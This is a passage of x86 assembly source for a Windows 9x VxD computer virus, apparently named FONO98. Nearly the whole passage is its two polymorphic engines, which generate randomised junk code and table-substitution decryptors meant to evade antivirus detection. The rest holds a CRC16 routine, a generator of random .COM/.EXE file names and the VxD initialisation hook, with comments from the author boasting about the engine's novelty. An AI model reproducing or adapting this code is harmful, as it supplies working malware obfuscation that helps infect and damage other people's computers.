       call rnd
       and eax, 0111b
       inc eax
       mov ecx, eax
 @a9:
       call garble                             ;garble a bit more
       loop @a9
       pop ecx
       loop @a8
       mov ax, 013cdh                          ;int 13
       stosw
       mov byte ptr [gtype], gfl
       mov word ptr [rgusg], 1000b
       call mgarble
       mov al, 06                              ;push es
       stosb
       call mgarble
       mov al, 53h                             ;push bx
       stosb
       call mgarble
       mov al, 0cbh                            ;retf
       stosb
       ret

mgarble:
       push ecx
       call rnd
       and eax, 0111b
       inc eax
       mov ecx, eax                            ;1-8 garbage calls
 @b9:
       call garble
       loop @b9
       pop ecx
       ret

maqfile:
       mov byte ptr [gtype], gnf
 @c0:
       call rnd
       or al, al
       jz @c0
       mov byte ptr [key], al
       call creg
       mov byte ptr [cntreg], dl
       bts word ptr [rgusg], dx
       call rnd
       and eax, 0111111111111b
       add ax, word ptr [esi+edx*2]
       add ax, VIRSIZE
       mov word ptr [cntregv], ax
 @c1:
       call rnd
       and eax, 011b
       add al, al
       add eax, offset32 crtbl
       mov ax, word ptr [eax]
       movzx edx, ah
       bts word ptr [rgusg], dx
       jc @c1
       mov byte ptr [pntreg], dl
       mov byte ptr [encintr], al
       mov ax, word ptr [esi+edx*2]
       mov word ptr [pntregv], ax
       mov dword ptr [strloop], edi
       call mgarble
       mov al, 80h
       mov ah, byte ptr [encintr]
       stosw
       push edi
       stosw
       mov al, byte ptr [key]
       stosb
       call mgarble
       mov al, 040h
       or al, byte ptr [pntreg]
       stosb
       call mgarble
       mov al, 040h
       or al, byte ptr [cntreg]                ;inc counter
       stosb
       call mgarble
       mov ax, 0f881h
       or ah, byte ptr [cntreg]
       stosw
       mov ax, word ptr [cntregv]
       stosw
       mov ax, 0074h
       stosw
       push edi
       call mgarble
       mov al, 0e9h
       stosb
       mov eax, edi
       sub eax, dword ptr [strloop]
       add eax, 2
       neg eax
       stosw
       call mgarble
       pop ebp
       mov ecx, edi
       sub ecx, ebp
       mov byte ptr [ebp-1], cl
       call mgarble
       call mgarble
       mov word ptr [rgusg], 0
       pop ebp

       mov ecx, edi
       sub ecx, [pDOSBase]
       add ecx, 100h

       movzx eax, word ptr [pntregv]
       sub ecx, eax
       mov word ptr [ebp], cx
       ret

mxrg:
       push eax
       call rnd
       and eax, 0111b
       inc eax
       mov ecx, eax
       pop eax
 @c3:
       call rndf
       jc @c4
       xchg eax, ebx                           ;randomize order
 @c4:
       call rndf
       jc @c5
       xchg ebx, edx
 @c5:
       call rndf
       jc @c6
       xchg edx, ebp
 @c6:
       call rndf
       jc @c7
       xchg ebp, eax
 @c7:
       loop @c3
       ret

garble:
       cmp [maq], 0
       je artm
       call rnd
       and eax, 0111b
       cmp eax, 0111b
       jne artm
       push ecx                                ;make a jump
       call rnd
       and eax, 0111b
       add eax, 4
       mov ecx, eax
       mov ah, 0ebh
       xchg al, ah
       stosw
 ngrb:
       call rnd
       stosb
       loop ngrb
       pop ecx
       ret
 artm:
       mov ebx, offset32 optbl
 @d1:
       call rnd
       and eax, 0111b
   gtype equ byte ptr $-1
   gfl = 0111b
   gnf = 0011b
       cmp al, 5
       ja @d1
       add al, al
       mov ax, word ptr [ebx+eax]              ;make aritm
       mov byte ptr [opcode1], ah
       mov byte ptr [opcode2], al
       call creg
       call gopc
       ret

creg:
       call rnd
       and eax, 0111b
       cmp al, 4
       jne @e1
       inc al
 @e1:
       mov dl, al
       bt word ptr [rgusg], dx                 ;used
       jc creg
       ret

gopc:
       mov bl, 12h
   opcode1 equ byte ptr $-1
       mov al, 81h
       cmp bl, 0c0h
       jb @f1
       stosb
 @f1:
       mov al, bl
       or al, dl
       stosb
       call rnd
       stosw
       mov bx, ax
       mov ax, word ptr [flags]
       sahf                                    ;look this!
   opcode2 equ byte ptr $+1                    ;the decriptor depends
       mov word ptr [esi+edx*2], bx            ;of the garbage code!
       lahf                                    ;we keep track of all, regs
       mov word ptr [flags], ax                ;and flags!!!! :)
       ret

mrval:
       push eax
       call rnd
       and eax, 011b                           ;ask a value... we make it
       or eax, eax                             ;(in the requested reg) using
       jz @g1                                  ;math and the current garbage
       dec eax                                 ;status! no more fixed movs :)
 @g1:
       add al, al
       movzx eax, word ptr [offset32 fxtbl+eax]
       or al, dl
       xchg al, ah
       mov byte ptr [opcode3], al
       mov al, 81h
       stosw
       cmp byte ptr [opcode3], 3               ;(as you noticed, i'm very
       pop eax                                 ;proud of this engine)
       jnz @g2
       neg eax
 @g2:
       movzx ebx, word ptr [esi+edx*2]
       jmp @g3
 @g3:
       xor eax, ebx
   opcode3 equ byte ptr $-2                    ;xor/add/sub
       stosw
       ret

rnd:
       push ecx
       push edx
       mov eax, 12345678h                      ;congruential something... :)
   seed equ dword ptr $-4
       mov ecx, eax
       imul eax, 41c64e6dh
       add eax, 3039h                          ;thankz to GriYo...
       ror ax, 1                               ;(do you not imagine how hard
       mov dword ptr [seed], eax               ;is code a decent rnd routine)
       xor eax, ecx
       pop edx
       pop ecx
       ret

rndf:
       push eax
       call rnd
       pop eax
       bt eax, 1                               ;random z flag
       ret

pDOSBase dd 0
maq     db 0
key     db 0
strloop dd 0
cntregv dw 0
cntreg  db 0
pntregv dw 0
pntreg  db 0
encintr db 0

optbl  dw 0b889h, 0f031h, 0c001h, 0e829h, 0d011h, 0d819h
       ;  MOV     XOR     ADD     SUB     ADC     SBB
fxtbl  dw 033f0h, 02bc0h, 003e8h
       ;  XOR     ADD     SUB
crtbl  dw 03b7h, 05b6h, 06b4h, 07b5h

flags  dw 0
rgusg  dw 0

rgtbl  equ this byte
   _ax dw 0
   _cx dw 0
   _dx dw 0
   _bx dw 0
   _sp dw 0
   _bp dw 0
   _si dw 0
   _di dw 0

PolyDOSSize equ $ - offset32 gldr


peng:
         push edi                              ;our 32bit poly engine
         push edi
         mov [totsize], ecx
         cld
         mov edi, offset32 crptbl
         mov ecx, 101h
         sub edx, edx
  tlp:
         mov byte ptr [edi+edx], dl
         inc edx
         loop tlp                              ;make linear table of values
         mov edi, offset32 crptbl
         mov ecx, 01111b
  tlp2:
         call rnd255                           ;randomize table
         mov ebx, eax
         call rnd255
         mov dl, byte ptr [edi+ebx]
         xchg dl, byte ptr [edi+eax]           ;keep exchanging some bytes
         mov byte ptr [edi+ebx], dl
         loop tlp2
         pop edi
         mov [reg32], 00010000b                ;set esp as used
         call garble32
         mov [reg32], 00110000b                ;set esp/ebp as used
         call get8reg
         mov [tmp], eax
         call get32_16reg
         mov [tpointer], eax
         call get32_16reg
         mov [dpointer], eax
         call get32_16reg
         mov [tmp2], eax
         call get32_16reg
         mov [counter], eax                    ;choose regs
         call garble32
         push offset32 mdecr                   ;return adress
         mov ebp, offset32 mcounter
         mov ebx, offset32 mpointer
         mov edx, offset32 mdpointer
         call rnd
         and eax, 0111b
         inc eax
         mov ecx, eax
  mixer1:
         call rndf
         jc m11
         xchg ebp, ebx
  m11:
         call rndf
         jc m12
         xchg edx, ebx
  m12:
         call rndf
         jc m13
         xchg edx, ebp
  m13:
         loop mixer1                           ;randomize calling order
         push ebp
         push ebx
         push edx
         ret
  mdecr:
         mov [lstart], edi
         call garble32
         mov ax, 1011011000001111b
         stosw                                 ;movzx d tmp2, [reg1+reg2]
         mov eax, [tmp2]
         shl eax, 3
         or al, 100b
         stosb
         mov eax, [tpointer]
         shl eax, 3
         or eax, [dpointer]
         stosb
         push eax
         call garble32
         mov al, 10001010b
         stosb                                 ;mov b tmp, [reg1+tmp2]
         mov eax, [tmp]
         shl eax, 3
         or al, 100b
         stosb
         push eax
         mov eax, [tpointer]
         shl eax, 3
         mov ebx, [tmp2]
         or eax, ebx
         stosb
         mov al, 10001000b
         stosb                                 ;mov b [reg1+reg2], tmp
         pop eax
         stosb
         pop eax
         stosb
         call garble32
         push offset32 mcontinue
         mov ebx, offset32 inc_pointer
         mov edx, offset32 dec_counter
         call rndf
         jc m2
         xchg edx, ebx                         ;randomize order
  m2:
         push ebx
         push edx
         ret
  mcontinue:
         call garble32
         mov al, 0bh
         stosb
         mov eax, [counter]
         shl eax, 3
         or eax, [counter]
         or al, 11000000b
         stosb                                 ;or reg, reg
         mov eax, 850fh
         stosw
         mov eax, [lstart]                     ;386+ jne
         sub eax, edi
         sub eax, 4
         stosd
         mov [reg32], 00010000b                ;set esp as used
         call garble32
         call garble32
         mov ecx, edi
         sub ecx, [tblstrt]                    ;calculate start of code
         mov esi, [pmdptr]                     ;to decript(delta-based)
         mov [esi], ecx
         pop edx
         mov ecx, edi
         sub ecx, edx                          ;exit with correct regs
         ret

inc_pointer:
         mov eax, 40h                          ;inc
         or eax, [dpointer]
         stosb
         call garble32
         ret

dec_counter:
         mov eax, 48h                          ;dec
         or eax, [counter]
         stosb
         call garble32
         ret

mcounter:
         mov eax, 0b8h                         ;mov
         or eax, [counter]
         stosb
         mov eax, [totsize]
         stosd
         call garble32
         ret

mpointer:
         mov al, 0e8h
         stosb
         mov ecx, 255+1
         mov eax, ecx
         stosd                                 ;do call
         mov [tblstrt], edi
         mov esi, offset32 crptbl
         rep movsb                             ;zopy table
         mov eax, 58h                          ;do pop
         or eax, [tpointer]
         stosb
         call garble32
         ret

mdpointer:
         mov eax, 0b8h                         ;mov
         or eax, [dpointer]
         stosb
         mov [pmdptr], edi
         stosd
         call garble32
         ret

gar:
         call rnd                              ;get any reg
         and eax, 0111b
         cmp al, 4                             ;sp never
         je gar
         ret

get32_16reg:                                   ;get a free 32/16bit reg
         call gar
         bts [reg32], eax
         jc get32_16reg
         ret

get8reg:                                       ;get a free 8bit reg
         call rnd                              ;al,cl,dl,bl
         and eax, 0011b
         bts [reg32], eax
         jc get8reg
         call rndf
         jc ntg
         or al, 0100b                          ;ah,ch,dh,bh
  ntg:
         ret

garble32:
         pushad
         cmp byte ptr [rlevel], 3
         je maxr
         inc byte ptr [rlevel]
         call rnd
         and eax, 0111b
         mov ecx, eax
         inc ecx
  ng32:
         push ecx
         call rnd
         and eax, 01111b
         shl eax, 2
         add eax, offset32 gtbl
         call dword ptr [eax]
         pop ecx
         loop ng32
         dec byte ptr [rlevel]
  maxr:
         mov dword ptr [esp], edi              ;change stack copy of edi
         popad
         ret

gtbl     equ this byte
         dd offset32 subr                      ;silly garblers :(
         dd offset32 subr
         dd offset32 jmps
         dd offset32 jmps
         dd offset32 jmps
         dd offset32 jmps                      ;no time to code good ones...
         dd offset32 jcc
         dd offset32 jcc
         dd offset32 jcc
         dd offset32 jcc
         dd offset32 calls
         dd offset32 calls
         dd offset32 calls
         dd offset32 calls
         dd offset32 calls
         dd offset32 calls

jcc:
         call rnd                              ;do jump conditional with
         and eax, 0fh                          ;real displacement(no shitty
         or eax, 0f80h                         ;$+2 thingie)
         xchg al, ah
         stosw
         stosd
         push edi
         call garble32
         pop esi
         mov ecx, edi
         sub ecx, esi
         mov dword ptr [esi-4], ecx
         ret

jmps:
         mov al, 0e9h                          ;do jump
         stosb
         stosd
         push edi
         call rnd
         and eax, 0111b
         inc eax
         mov ecx, eax
  njnk:
         call rnd                              ;fill with junk
         stosb
         loop njnk
         pop esi
         mov ecx, edi
         sub ecx, esi
         mov dword ptr [esi-4], ecx
         ret

subr:                                          ;make call to subroutine
         cmp dword ptr [subad], 0
         jz ncall                              ;a subroutine was coded?
         mov al, 0e8h
         stosb
         mov eax, edi
         sub eax, dword ptr [subad]            ;calc subr address
         add eax, 4
         neg eax
         stosd
  ncall:
         ret

calls:
         cmp dword ptr [subad], 0              ;make subroutine
         jne ncall
         mov al, 0e9h                          ;the old thing...
         stosb
         stosd                                 ;jump @@1
         push edi                              ;@@2:
         call garble32                         ;*garbage*
         mov al, 0c3h                          ;*garbage*
         stosb                                 ;ret
         pop esi                               ;@@1:
         mov ecx, edi
         sub ecx, esi
         mov dword ptr [esi-4], ecx
         mov dword ptr [subad], esi            ;store sub address
         ret

rnd255:
         call rnd
         and eax, 011111111b
         ret

encript_pe:
         pushad
         mov ecx, dword ptr [totsize]          ;our poly engine isnt a
         mov ebx, offset32 crptbl              ;cyclical decriptor using
  ecrt:                                        ;xor/add/sub or like...
         lodsb
         push ecx                              ;we use a substitution scheme,
         push edi                              ;based in a table... This way,
         mov ecx, 100h                         ;'A'=='2' '#'=='x' and so...
         mov edi, ebx                          ;no virus i know use this
         repne scasb
         dec edi
         sub edi, ebx
         mov eax, edi                          ;eax hold offset into table
         pop edi
         pop ecx
         stosb
         loop ecrt
         mov [esp], edi                        ;setup edi copy in stack
         popad
         ret

subad    dd 0
rlevel   db 0
tmp      dd 0
tmp2     dd 0
tpointer dd 0
dpointer dd 0
counter  dd 0
pmdptr   dd 0
tblstrt  dd 0
lstart   dd 0
reg32    dd 0
totsize  dd 0


BeginProc CRC16
         push ebx
         push ecx
         mov ebx, 0a001h
         mov edi, offset32 CrcTab
         xor edx, edx
  crc16nb:
         mov ax, dx
         mov cx, 8
  crc16l:
         shr ax, 1
         jae crc16sk
         xor ax, bx
  crc16sk:
         loop crc16l
         stosw                                 ;make da table
         inc edx
         cmp edx, 512
         jne crc16nb
         pop ecx
         xor eax, eax
  CRC16Loop:
         xor ebx, ebx
         mov bl, al
         lodsb
         xor bl, al
         shl bx, 1
         mov bx, word ptr [CrcTab+bx]          ;make CRC16 of it
         xor bl, ah
         mov eax, ebx
         loop CRC16Loop
         pop ebx
         ret
EndProc CRC16



BeginProc Random4Name
         mov dword ptr [edi], 'AAAA'           ;setup base name
         mov ecx, 4
         in al, 40h
         mov ah, al
  NextLetter:
         in al, 40h
         xor al, ah
         mov ah, al
         and al, 01111b
         add byte ptr [edi], al                ;add random values to make
         inc edi                               ;random letter, to obtain a
         loop NextLetter                       ;random name! :)
         in al, 40h
         cmp al, 80h
         mov eax, 12345678h
       org $-4
         db '.', 'C', 'O', 'M'
         jb PutThisOne                         ;put a .COM extension
         mov eax, 12345678h
       org $-4
         db '.', 'E', 'X', 'E'
  PutThisOne:
         mov [edi], eax                        ;or a .EXE one
         ret
EndProc Random4Name



BeginProc FONO98_Control
         Control_Dispatch Init_Complete, FONO98_Device_Init
         clc                                   ;our init procedure...
         ret                                   ;other virus wait for more
EndProc FONO98_Control                         ;calls... but i did only this
                                               ;one and it worked, so...


VxD_Locked_Code_Ends

End